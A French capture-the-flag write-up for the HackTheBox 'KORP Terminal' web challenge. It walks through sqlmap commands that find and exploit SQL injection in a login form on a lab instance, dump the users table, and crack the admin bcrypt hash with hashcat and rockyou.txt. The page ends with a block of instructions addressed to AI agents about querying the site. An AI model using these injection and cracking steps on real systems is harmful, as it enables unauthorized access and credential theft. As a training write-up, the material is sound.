# KORP Terminal

**Catégorie:** Web\
**Difficulté:** very-easy\
**Flag:** HTB{t3rm1n4l\_cr4ck1ng\_sh3n4nig4n5}

## Challenge

{% hint style="info" %}

#### Description

***

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
{% endhint %}

{% hint style="warning" %}
Ce challenge tourne sur un docker, disponible sur [Github](https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BVery%20Easy%5D%20KORP%20Terminal)
{% endhint %}

## Analyse du site

Le site se compose uniquement d’un formulaire qui est envoyé en POST avec les paramètres **`username`** et **`password`**. On peut lancer un sqlmap dessus pour voir si une injection est détectée

<figure><img src="/files/7GHfu6VSiqplHFriJ9PG" alt=""><figcaption></figcaption></figure>

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username,password" --method POST --ignore-code 401 --batch

[...]
[22:26:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[22:26:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:26:15] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:26:16] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:26:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:26:19] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'username' is vulnerable.
```

***

## Exploitation de l’injection SQL

Le paramètre **`username`** est vulnérable, on va pouvoir tenter de dump la base de données

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 --dbs --batch

available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
```

On y trouve la database **`korp_terminal`**

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal --tables --batch

Database: korp_terminal
[1 table]
+-------+
| users |
+-------+
```

Celle-ci est composé d’une seule table : **`users`**

```
sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal -T users --dump --batch

Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+
```

On y trouve 1 compte : **`admin`**

Le mot de passe est visiblement hashé, même si l’on reconnaît le bcrypt on va passer par **hashcat** pour l’identifier à coup sûr puis on en profitera pour essayer de le casser

***

## Cassage du hash

Préalablement on enregistre le mot de passe dans un fichier, ici nommé **`hashes.txt`**

J’utilise la wordlist **`rockyou.txt`** pour tenter de le casser

```
$ hashcat hashes.txt

The following 4 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
```

On ne s’était pas trompé, c’est bien du **bcrypt**, passons au bruteforce

```
$ hashcat hashes.txt -m 3200 rockyout.txt

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache built:
* Filename..: ../rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
```

Et voilà, notre mot de passe : **`password123`**

***

## Récupération du flag

Maintenant il est possible de se connecter avec **`admin:password123`**

<figure><img src="/files/y8UrVWiZ4EnbbnrcC1sn" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.thaysan.com/ctf-and-writeups/2024-or-htb-cyber-apocalypse-challenges/web/korp-terminal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.